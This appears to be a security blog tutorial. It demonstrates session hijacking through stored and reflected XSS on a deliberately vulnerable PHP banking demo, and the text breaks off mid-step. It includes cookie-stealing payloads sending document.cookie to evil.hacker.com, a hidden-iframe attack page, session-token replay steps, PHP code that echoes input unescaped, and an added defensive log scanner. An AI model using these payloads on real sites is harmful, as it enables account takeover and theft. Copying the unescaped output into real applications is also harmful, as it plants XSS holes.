1) In the first, the attacker posts some crafted data containing malicious code that the application stores.<br />
2) In the second, a victim views a page containing the attacker's data, and the malicious script is executed in the victim's browser. <br /><br />
We develop a web application which has a stored XSS vulnerability. The attacker logs in to the application and stores a malicious script in her profile. When the victim logs in and views the attacker's profile, the script executes in the victim's browser and sends the victim's session token to the attacker. <br />
<br />
<br />
Web Server Name: <span style="color: red;">meru.mycompany.com</span><br />
Attacker Machine : <span style="color: red;">evil.hacker.com </span><br />
<br />
<br />
1) The attacker logs in to the application by viewing the URL <span style="color: blue;"><span style="background-color: white;">http://meru.mycompany.com/login.php.</span></span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe4H-h3hdiUfi1jCydzWbQ8l28OcWP1ScV55cTG6OixGhviBvDalogU8IYrXsla6LsaI3jmSIUuQTiBNi-mkXFSKkElzQvZ63TVh6mM0q54-Y_okX2sJtX_BxGNCdZCS_m7WgVHd350dTR/s1600/Screenshot+from+2015-06-11+18%253A35%253A20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe4H-h3hdiUfi1jCydzWbQ8l28OcWP1ScV55cTG6OixGhviBvDalogU8IYrXsla6LsaI3jmSIUuQTiBNi-mkXFSKkElzQvZ63TVh6mM0q54-Y_okX2sJtX_BxGNCdZCS_m7WgVHd350dTR/s400/Screenshot+from+2015-06-11+18%253A35%253A20.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
<br /><br />
2) The attacker opens the page '<span style="color: blue;">http://meru.mycompany.com/edit_cust.php</span>' and enters the following JavaScript in the <span style="color: blue;">Address</span> field. The application stores it without filtering and will later echo it into other users' pages without encoding it. <br />
<br />
<span style="color: red;"><a href=# onclick=\"document.location=\'http://evil.hacker.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Address</a></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhkKMRP_KhtMVC1Q0ekaDe_u0l8tFGVN65U4cRheqBI6Uwiff1uGGdpE-Chi8I3tPo0mEH7iErdLbQM3aYF5fvgi-2e_tkJCkWsjhEgtbW9gcv8WFNkqseCgORg85QE306vNHh8Twghzit/s1600/Screenshot+from+2015-06-11+18%253A23%253A23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhkKMRP_KhtMVC1Q0ekaDe_u0l8tFGVN65U4cRheqBI6Uwiff1uGGdpE-Chi8I3tPo0mEH7iErdLbQM3aYF5fvgi-2e_tkJCkWsjhEgtbW9gcv8WFNkqseCgORg85QE306vNHh8Twghzit/s400/Screenshot+from+2015-06-11+18%253A23%253A23.png" width="400" /></a></div>
The attacker logs out of the application. And silently waits for the victim to log in and view her profile. <br />
<br />
<br />
3) The victim logs in to the application at the URL <span style="color: blue;"><span style="background-color: white;">http://meru.mycompany.com/login.php</span></span> and views customer profiles on the page '<span style="color: blue;"><span style="background-color: white;">http://meru.mycompany.com/</span>list_cust.php</span>'. The attacker's stored address is rendered as a live link labelled <span style="color: red;"><u>My Address</u></span>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2ixznytdQD7Y_tWl3rlY0__K_ONFu2DONlsUcAOCT0ONfGo4KZ1ngyaSUaHl_Iipgq89XjLF1zUoBT9ZqN66RGOZi7eFrMDgge6JY_9FwROI68J7kDlrrgUMWMQSte_ijHSs00Qb9-pTE/s1600/Screenshot+from+2015-06-11+18%253A24%253A18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2ixznytdQD7Y_tWl3rlY0__K_ONFu2DONlsUcAOCT0ONfGo4KZ1ngyaSUaHl_Iipgq89XjLF1zUoBT9ZqN66RGOZi7eFrMDgge6JY_9FwROI68J7kDlrrgUMWMQSte_ijHSs00Qb9-pTE/s400/Screenshot+from+2015-06-11+18%253A24%253A18.png" width="400" /></a></div>
<br />
4) When the victim clicks the link, the injected onclick handler runs in the victim's browser, within the victim's authenticated session, and navigates to '<span style="color: blue;">evil.hacker.com</span>' with the victim's session token in the query string. <br />
<br />
<br />
<br />
5) The attacker on 'evil.hacker.com' runs '<span style="color: red;">Wireshark</span>' and captures the incoming request, including the session token, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s1600/Screenshot+from+2015-06-11+14%253A04%253A01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s640/Screenshot+from+2015-06-11+14%253A04%253A01.png" width="640" /></a></div>
<br />
<br />
6) Now the attacker has to insert this session token into a cookie in his own browser and hijack the user's session. This needs Firefox with the <span style="color: red;">Greasemonkey</span> extension and the <span style="color: red;">Cookie Injector</span> user script installed:<br />
<br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" rel="nofollow">https://addons.mozilla.org/en-US/firefox/addon/greasemonkey</a><br />
<a href="http://userscripts-mirror.org/scripts/show/119798" rel="nofollow">http://userscripts-mirror.org/scripts/show/119798</a><br />
<a href="http://dustint.com/post/12/cookie-injection-using-greasemonkey" rel="nofollow">http://dustint.com/post/12/cookie-injection-using-greasemonkey</a><br />
<br />
With those in place, the attacker performs the following steps:<br />
<br />
6.1) Copy the session token from the Wireshark output: right click on <b>Request URI</b>, select <b>Copy</b> -> <b>Bytes</b> -> <b>Printable Text Only</b>, and paste it into a text editor such as gedit, as shown below:<br />
<br />
<span style="color: red;">/xss.php?c=PHPSESSID%3Dnef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.2) Edit the copied text as shown below.<br />
<br />
<span style="color: red;">Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.3) Copy the above line.<br />
<br />
6.4) Start Firefox web browser. Press <b>Alt+C</b> to open the Cookie Injector dialog. Paste the above copied line and click <b>OK</b> as shown below.<br />
<br />
<img class="CSS_LIGHTBOX_SCALED_IMAGE_IMG" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgrPblfz2tAxQflFOTWHan1jo6iqUSbICZLl-jd9d-Mo_bKhxoPmkojoOiMTP14uO5T6kZWUgC4ZiFpwTkTraJoSgIt8WljQiGtIN76fmJYCszOM9bTratS4OEQgDEzOkg-Obt_da7CBMO/s1600/Screenshot+from+2015-06-11+14%253A06%253A08.png" style="height: 522px; width: 696px;" /><br />
<br />
<br />
<br />
<br />
6.5) The session has been hijacked: the attacker opens the URL <span style="color: red;">http://meru.mycompany.com/transfer.php</span> as the victim and transfers money out of the victim's account.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s1600/Screenshot+from+2015-06-11+14%253A07%253A28.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s640/Screenshot+from+2015-06-11+14%253A07%253A28.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
Source Code for the Application:<br />
<br />
<span style="color: red;">login.php</span><br />
<?php<br />
session_start();<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
if(isset($_POST['submit'])){<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
// prepared statement: the submitted login id and password are bound as data, never spliced into the SQL text<br />
$stmt = $conn->prepare("select loginid,passwd,custname from customer where loginid = ? and passwd = ?");<br />
$stmt->bind_param('ss', $loginid, $passwd);<br />
$stmt->execute();<br />
$result = $stmt->get_result();<br />
<br />
if ($result->num_rows == 1){<br />
$row = $result->fetch_assoc();<br />
$custname = $row['custname'];<br />
<br />
$_SESSION['loginid'] = $loginid;<br />
$_SESSION['custname'] = $custname;<br />
<br />
$stmt->close();<br />
$conn->close();<br />
// stop here so nothing is sent after the redirect header<br />
header('Location: search.php');<br />
exit;<br />
}<br />
$error_msg="invalid username or password.\n";<br />
<br />
$stmt->close();<br />
$conn->close();<br />
}<br />
}<br />
?><br />
<br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<h2>Enter login details</h2><br />
<?php<br />
if(! empty($error_msg)){<br />
echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
?><br />
<br />
<form action="login.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="password" name="passwd" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<span style="color: red;">edit_cust.php</span><br />
<br />
<?php<br />
session_start();<br />
<br />
// handle the submitted form before any HTML is sent, otherwise the redirect header cannot be set<br />
if(isset($_SESSION['loginid']) && isset($_POST['submit'])){<br />
<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
$custname = $_POST['custname'];<br />
$accountno = $_POST['accountno'];<br />
$balance = $_POST['balance'];<br />
$address = $_POST['address'];<br />
$mobile = $_POST['mobile'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
 die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
// prepared statement: the submitted values are bound as data, never spliced into the SQL text<br />
$stmt = $conn->prepare("update customer set passwd = ?, custname = ?, accountno = ?, balance = ?, address = ?, mobile = ? where loginid = ?");<br />
$stmt->bind_param('sssssss', $passwd, $custname, $accountno, $balance, $address, $mobile, $loginid);<br />
<br />
if($stmt->execute() === TRUE){<br />
 $stmt->close();<br />
 $conn->close();<br />
 header('Location: index.php');<br />
 exit;<br />
}<br />
$error_msg = "error querying database" . $stmt->error;<br />
$stmt->close();<br />
$conn->close();<br />
}<br />
?><br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<?php<br />
if(!isset($_SESSION['loginid'])){<br />
 echo 'Please login';<br />
} else{<br />
<br />
if(!empty($error_msg)){<br />
 echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
<br />
$loginid = $_SESSION['loginid'];<br />
$passwd = $custname = $accountno = $balance = $address = $mobile = '';<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
 die("connect error" . $conn->connect_error);<br />
}<br />
<br />
$stmt = $conn->prepare("select * from customer where loginid = ?");<br />
$stmt->bind_param('s', $loginid);<br />
$stmt->execute();<br />
$result = $stmt->get_result();<br />
<br />
if($result->num_rows > 0){<br />
 $row = $result->fetch_assoc();<br />
 $passwd = $row['passwd'];<br />
 $custname = $row['custname'];<br />
 $accountno = $row['accountno'];<br />
 $balance = $row['balance'];<br />
 $address = $row['address'];<br />
 $mobile = $row['mobile'];<br />
}<br />
$stmt->close();<br />
$conn->close();<br />
?><br />
<br />
<h2>Enter customer details</h2><br />
<br />
<form action="edit_cust.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" value="<?php echo $loginid;?>" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="text" name="passwd" value="<?php echo $passwd;?>" /> <br/><br />
<br />
<label>Customer name:</label><br />
<input type="text" name="custname" value="<?php echo $custname;?>" /> <br/><br />
<br />
<label>Account No:</label><br />
<input type="text" name="accountno" value="<?php echo $accountno;?>" /> <br/><br />
<br />
<label>Balance:</label><br />
<input type="text" name="balance" value="<?php echo $balance;?>" /> <br/><br />
<br />
<label>Address:</label><br />
<input type="text" name="address" value="<?php echo $address;?>" /> <br/><br />
<br />
<label>Mobile No.:</label><br />
<input type="text" name="mobile" value="<?php echo $mobile;?>" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
<br />
<?php<br />
}<br />
?><br />
<br />
</body><br />
</html><br />
<br />
<br />
<span style="color: red;">list_cust.php</span><br />
<?php<br />
session_start();<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
 echo "please login";<br />
}else{<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
 die("connect error" . $conn->connect_error);<br />
}<br />
<br />
$sql = "select * from customer";<br />
$result = $conn->query($sql);<br />
<br />
if($result->num_rows > 0){<br />
<br />
 echo '<table>';<br />
 echo '<tr><th>Login ID</th><th>Cust Name</th><th>Account No </th><th> Balance</th><th>Address</th><th>Mobile</th></tr>';<br />
 while($row = $result->fetch_assoc()){<br />
 echo "<tr><td><strong>" . $row['loginid'] . "</strong></td>";<br />
 echo "<td>" . $row['custname'] . "</td>";<br />
 echo "<td>" . $row['accountno'] . "</td>";<br />
 echo "<td>" . $row['balance'] . "</td>";<br />
 echo "<td>" . $row['address'] . "</td>";<br />
 echo "<td>" . $row['mobile'] . "</td> </tr>";<br />
 }<br />
 echo '</table>';<br />
<br />
}else{<br />
 echo "0 results";<br />
}<br />
<br />
$conn->close();<br />
}<br />
<br />
?><br />
<br />
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-45374956238706470682015-06-10T18:46:00.000+05:302015-06-20T23:05:28.370+05:30Session Hijacking Using Reflected XSS: Example Application<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Session hijacking occurs when an attacker captures a session token and injects it into their own browser to gain access to the victim's authenticated session.<br />
<br />
There are some limitations of session hijacking attacks:<br />
1) Stealing cookies is useless if the target is using <span style="color: red;">https://</span> for browsing.<br />
2) Most cookies expire when the target logs out of a session. This also logs the attacker out of the session.<br />
3) Many websites do not support parallel logins, which negates the use of a stolen cookie.<br />
<br />
In this tutorial, we will see how to steal a session cookie using a reflected cross-site scripting attack.<br />
<br />
Cross-site scripting (XSS) is a vulnerability that permits an attacker
to inject code (typically HTML or JavaScript) into the contents of a
website not under the attacker's control. When a victim views such a
page, the injected code executes in the victim's browser. Thus, the
attacker has bypassed the
browser's <a href="http://www.google.com/search?q=same+origin+policy">same
origin policy</a> and can steal the victim's private information
associated with the website in question.
<br />
In a <b>reflected XSS</b> attack, the attack is in the request itself
(frequently the URL) and the vulnerability occurs when the server
inserts the attack in the response verbatim or incorrectly escaped or
sanitized. The victim triggers the attack by browsing to a malicious
URL created by the attacker.<br />
<br />
We develop a web application which has a reflected XSS vulnerability. When a user logs into the application, a session is created for them. The attacker creates a malicious URL to exploit the XSS vulnerability and capture the session token of the logged-in user.<br />
<br />
<br />
Web Server Name: meru.mycompany.com<br />
Attacker Machine: evil.hacker.com<br />
<br />
<br />
1) Log in to the application by viewing the URL <span style="color: red;">http://meru.mycompany.com/login.html</span>. Enter the username and password. On successful authentication, a session is created for the user and the user is redirected to the URL <span style="color: red;">http://meru.mycompany.com/search.php</span>. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s1600/Screenshot+from+2015-06-09+23%253A02%253A47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfBffvaGIDe6XcJ9QzkD-Ayp7U5sVcGiywOaUhdjl_7Hpch01QhyphenhyphenRtbIyVwAMckwVoV3mBU8hWUQTj8h-I4b2coJhMeMYg6Jk7c0qWQYqm7od73_pJcZ3sdHZKRDGhe9ahJWUbGaaO_aV3/s640/Screenshot+from+2015-06-09+23%253A02%253A47.png" width="640" /></a></div>
<br />
<br />
<br />
<span style="color: red;">login.php</span><br />
<?php<br />
session_start();<br />
<br />
if(!isset($_SESSION['loginid'])){<br />
if(isset($_POST['submit'])){<br />
$loginid = $_POST['loginid'];<br />
$passwd = $_POST['passwd'];<br />
<br />
$conn = new mysqli('localhost','shabbir','shabbir','mybank');<br />
if($conn->connect_error){<br />
die('error connecting to server' . $conn->connect_error);<br />
}<br />
<br />
// prepared statement: the submitted login id and password are bound as data, never spliced into the SQL text<br />
$stmt = $conn->prepare("select loginid,passwd,custname from customer where loginid = ? and passwd = ?");<br />
$stmt->bind_param('ss', $loginid, $passwd);<br />
$stmt->execute();<br />
$result = $stmt->get_result();<br />
<br />
if ($result->num_rows == 1){<br />
$row = $result->fetch_assoc();<br />
$custname = $row['custname'];<br />
<br />
$_SESSION['loginid'] = $loginid;<br />
$_SESSION['custname'] = $custname;<br />
<br />
$stmt->close();<br />
$conn->close();<br />
// stop here so nothing is sent after the redirect header<br />
header('Location: search.php');<br />
exit;<br />
}<br />
$error_msg="invalid username or password.\n";<br />
<br />
$stmt->close();<br />
$conn->close();<br />
}<br />
}<br />
?><br />
<br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<h2>Enter login details</h2><br />
<?php<br />
if(! empty($error_msg)){<br />
echo "<strong>" . $error_msg . "</strong><br/>";<br />
}<br />
?><br />
<br />
<form action="login.php" method="post"><br />
<br />
<label>Login id:</label><br />
<input type="text" name="loginid" /> <br/><br />
<br />
<label>Password:</label><br />
<input type="password" name="passwd" /> <br/><br />
<br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
</body><br />
</html><br />
<br />
<br />
<br />
<br />
<br />
2) The page 'search.php' contains a reflected XSS vulnerability. The application simply copies the search keyword into the output as shown below. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxhMpWUi0RD-_ZTyEpZME8CFBxurhbeTKHNjj2iSwiCMwr5w22Ut2YoHiAkXnK4eDzNUndDCE2CR0NWwovWICXczvdupHVdtswahZ24hOu9QDtjEgTVOb81uE0SOFVee2eDjJIH9pK0s1/s1600/Screenshot+from+2015-06-09+23%253A06%253A41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxhMpWUi0RD-_ZTyEpZME8CFBxurhbeTKHNjj2iSwiCMwr5w22Ut2YoHiAkXnK4eDzNUndDCE2CR0NWwovWICXczvdupHVdtswahZ24hOu9QDtjEgTVOb81uE0SOFVee2eDjJIH9pK0s1/s640/Screenshot+from+2015-06-09+23%253A06%253A41.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujBYxolXqn16Q6hXH5SWlP5V4nDzzMPnQ3OJlsPSPZD4paikUA_UTZsM3Ks44dOhSogg4EMJX8ebqL_EJni9LrHEN_DckJl_0qxpAMlKv_fmbKfz8-OXoyVOoollIcP301P_nvjKsdAq-/s1600/Screenshot+from+2015-06-09+23%253A07%253A48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujBYxolXqn16Q6hXH5SWlP5V4nDzzMPnQ3OJlsPSPZD4paikUA_UTZsM3Ks44dOhSogg4EMJX8ebqL_EJni9LrHEN_DckJl_0qxpAMlKv_fmbKfz8-OXoyVOoollIcP301P_nvjKsdAq-/s640/Screenshot+from+2015-06-09+23%253A07%253A48.png" width="640" /></a></div>
This behavior of taking user-supplied input and inserting it into the
HTML of the server's response is one of the signatures of reflected XSS
vulnerabilities. <br />
<br />
<span style="color: red;">search.php</span><br />
<?php<br />
session_start();<br />
?><br />
<br />
<html><br />
<head><br />
<title>Welcome to mybank</title><br />
</head><br />
<br />
<body><br />
<br />
<?php<br />
if(!isset($_SESSION['loginid'])){<br />
echo "please login";<br />
<br />
} else{<br />
if(isset($_GET['submit'])){<br />
<br />
$item = $_GET['item'];<br />
echo "You searched for " . $item . "<br/>";<br />
<br />
} else{<br />
?><br />
<br />
<h2>Enter Search Item </h2><br />
<br />
<form action="search.php" method="get"><br />
<br />
<label>Search Keyword:</label><br />
<input type="text" name="item" /> <br/><br />
<input type="submit" name="submit" value="submit"/><br />
</form><br />
<br />
<?php<br />
}<br />
}<br />
?><br />
<br />
</body><br />
</html><br />
<br />
<br />
<br />
3) If we enter the following JavaScript as the search keyword: <span style="color: red;">car<script>alert(document.cookie)</script></span><br />
<br />
we get a pop-up dialog displaying the session id, as shown below.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4du0LeouSeVXc4eG6CLZLrCkRIzYRqThMIkPb0KsCSMHXcF88xbMFA5_jKCnNdAGPFivWFkDoCBNBbkrnLf3gFjZ1cfU_qwXngze8apdNjxwKibZXbRMbx5DLfQxvGx81v-00JKVmGf4E/s1600/Screenshot+from+2015-06-09+23%253A11%253A24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4du0LeouSeVXc4eG6CLZLrCkRIzYRqThMIkPb0KsCSMHXcF88xbMFA5_jKCnNdAGPFivWFkDoCBNBbkrnLf3gFjZ1cfU_qwXngze8apdNjxwKibZXbRMbx5DLfQxvGx81v-00JKVmGf4E/s640/Screenshot+from+2015-06-09+23%253A11%253A24.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
4) Through some means, the attacker feeds the following URL to the user.<br />
<span style="color: red;">http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/xss.php"%2bdocument.cookie;</script>&submit=submit</span><br />
<br />
The user requests the URL fed to him by the attacker from the application.<br />
<br />
Because of the XSS vulnerability, the server's response contains the JavaScript the attacker created.<br />
<br />
The user's browser executes the attacker's JavaScript. The malicious JavaScript created by the attacker is:<br />
<br />
<span style="color: red;">var i=new Image; i.src="http://evil.hacker.com/xss.php"+document.cookie</span> <br />
<br />
This code causes the user's browser to make a request to 'evil.hacker.com'. The request contains the user's session token for the application. <br />
<br />
<div style="text-align: left;">
Note that the victim does not even need to explicitly click on the
malicious link. Suppose the attacker
owns '<i>evil.hacker.com</i>' and creates a page '<i>attack.php</i>' with an
<span style="font-family: inherit;"><code><iframe></code></span> pointing to the malicious link; if the
victim visits '<i><span style="color: red;">http://evil.hacker.com/attack.php</span></i>', the attack will
silently be activated. </div>
<div style="text-align: left;">
<br />
<html><br />
<body><br />
<iframe height="0" width="0" src=<span style="color: red;">'http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/"%2bdocument.cookie;</script>&submit=submit</span>'></iframe><br />
</body><br />
</html><br />
<br /></div>
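From the defender's side, the request in step 4 leaves a trace in the web server's access log. The following Python script is an added example, not code from the original post: it URL-decodes each query parameter of constructed combined-format log lines, flags the script tag, document.cookie access and remote image load that the payload relies on, and checks a Set-Cookie header for the HttpOnly, Secure and SameSite attributes that keep document.cookie from exposing PHPSESSID. The log lines and cookie values are constructed.<br />

```python
"""Spot reflected-XSS cookie-theft attempts in the web server's access log.

Added example (not code from the original post). Every query parameter of
each request is URL-decoded and matched against the markers the attack in
step 4 relies on; a Set-Cookie header is checked for the flags that would
have kept document.cookie from reading PHPSESSID.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-log-format lines. The second is the step-4 URL as a
# browser would send it; the third is a different probe that does not touch cookies.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jun/2015:23:06:41 +0530] "GET /search.php?item=car&submit=submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Jun/2015:23:11:24 +0530] "GET /search.php?item=car%3Cscript%3Evar+i%3Dnew+Image%3B+i.src%3D%22http%3A%2F%2Fevil.hacker.com%2Fxss.php%22%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Jun/2015:23:12:02 +0530] "GET /search.php?item=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&submit=submit HTTP/1.1" 200 600 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Jun/2015:23:13:10 +0530] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# cookie_access is the marker that turns a generic XSS probe into session theft.
INDICATORS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("cookie_access", re.compile(r"document\s*\.\s*cookie", re.I)),
    ("remote_load", re.compile(r"new\s+Image|\.src\s*=", re.I)),
]


def decoded_params(target):
    """Path and fully decoded query values of a request target.

    parse_qs already decodes one layer; the extra unquote() catches a
    doubly-encoded payload (%253C) without turning a literal '+' into a space.
    """
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    return parts.path, {k: [unquote(v) for v in vs] for k, vs in params.items()}


def classify_request(target):
    """Map each parameter name to the indicator labels found in its values."""
    path, params = decoded_params(target)
    hits = {}
    for name, values in params.items():
        labels = [lbl for lbl, rx in INDICATORS if any(rx.search(v) for v in values)]
        if labels:
            hits[name] = labels
    return path, hits


def scan_log(text):
    """Return one finding per suspicious request line, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, hits = classify_request(m["target"])
        if not hits:
            continue
        stealing = any("cookie_access" in labels for labels in hits.values())
        findings.append({
            "ip": m["ip"], "time": m["ts"], "path": path, "params": hits,
            "severity": "high" if stealing else "medium",
        })
    return findings


def cookie_flags_missing(set_cookie_header):
    """Hardening attributes absent from a Set-Cookie header.

    document.cookie cannot read an HttpOnly cookie, which is what defeats the
    exfiltration above; Secure and SameSite narrow the remaining exposure.
    """
    attrs = {p.strip().split("=", 1)[0].lower() for p in set_cookie_header.split(";")[1:]}
    return sorted({"httponly", "secure", "samesite"} - attrs)


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["severity"], finding["ip"], finding["path"], finding["params"])
    print(cookie_flags_missing("PHPSESSID=nef6vmd3ag8h7lo50m8190iee5; path=/"))
```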
<br />
5) The attacker on 'evil.hacker.com' runs '<span style="color: red;">Wireshark</span>' and captures the session token as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s1600/Screenshot+from+2015-06-11+14%253A04%253A01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhevH5WezVsLQZ9buWiY5bLJWxrAx71D21YXgeubBFlR7zOlqWr6fOwi6Kr1hqcmAFHdEKbcuICXoTfplTI6qmh-HwSRAn8jfeKYZQQjKX9tyndXU_cf6oRiEKyalUuvF2k9_1ESnCCybGq/s640/Screenshot+from+2015-06-11+14%253A04%253A01.png" width="640" /></a></div>
<br />
<br />
6) Now the attacker has to insert this session token in a cookie in his
browser and hijack the user session. The attacker will perform the following steps:<br />
<br />
6.1) Open Firefox Web Browser. Install <span style="color: red;">Grease Monkey</span> Firefox extension<br />
<br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" rel="nofollow">https://addons.mozilla.org/en-US/firefox/addon/greasemonkey</a><br />
<br />
6.2) Install <span style="color: red;">Cookie Injector</span> script in Grease Monkey.<br />
<br />
